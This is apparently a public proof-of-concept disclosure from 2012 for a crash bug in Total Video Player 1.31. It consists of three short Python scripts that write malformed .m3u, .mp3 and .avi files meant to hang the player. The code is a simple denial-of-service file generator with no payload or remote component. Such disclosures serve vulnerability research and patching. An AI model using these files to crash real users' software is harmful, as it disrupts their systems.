# Exploit Title: Total Video Player 1.31 .m3u Crash Poc # Date: June 17 2012 # Exploit Author: 0dem # Vendor Homepage: http://www.effectmatrix.com/ # Software Link: http://download.cnet.com/Total-Video-Player/3000-2139_4-10552696.html # Version: V1.31 # Tested on: Windows XP SP 3 # Description: Total Video Player has no correct input handling and will hang, # when trying to open malformed .m3u files. .mp3 and .avi files are affected too
# --- m3u ----------------------------------------------- #!/usr/bin/python junk = "#EXTM3U\n" junk += "#EXTINF:666, 0dem, 0dem\n" junk += "c:\\A"
file = open("PoC.m3u","w") file.writelines(junk) file.close()
# --- mp3 ----------------------------------------------- #!/usr/bin/python junk = "\x41" * 100 file = open("PoC.mp3","w") file.writelines(junk) file.close()
# --- avi ----------------------------------------------- #!/usr/bin/python junk = "\x41" * 100 file = open("PoC.avi","w") file.writelines(junk) file.close()